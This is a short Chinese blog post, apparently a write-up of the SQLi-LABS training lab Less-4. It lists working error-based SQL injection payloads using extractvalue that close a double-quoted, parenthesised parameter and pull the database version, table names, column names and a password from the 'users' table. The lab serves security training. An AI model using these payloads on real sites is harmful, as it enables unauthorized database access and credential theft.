[SQLi-LABS] Less-4

最新推荐文章于 2022-06-10 15:10:50 发布

原创最新推荐文章于 2022-06-10 15:10:50 发布 · 171 阅读

0 ·

CC 4.0 BY-SA版权

本文探讨了双引号变形字符型注入攻击方法，通过修改GET参数中的双引号进行SQL注入，演示了如何利用extractvalue函数爆表、爆字段及爆内容，对网站安全防护提出了挑战。

双引号变形字符型注入，其余与题三相同

/Less-4/?id=1")--+
 /Less-4/?id=1")and extractvalue(1, concat(0x7e, (select version()),0x7e))--+
 /Less-4/?id=1") and extractvalue(1, concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'))--+  //爆表
 /Less-4/?id=1") and extractvalue(1, concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),'~'))--+  //爆字段
 /Less-4/?id=1") and extractvalue(1,concat('~',(select password from users limit 0,1),'~'))--+  //爆内容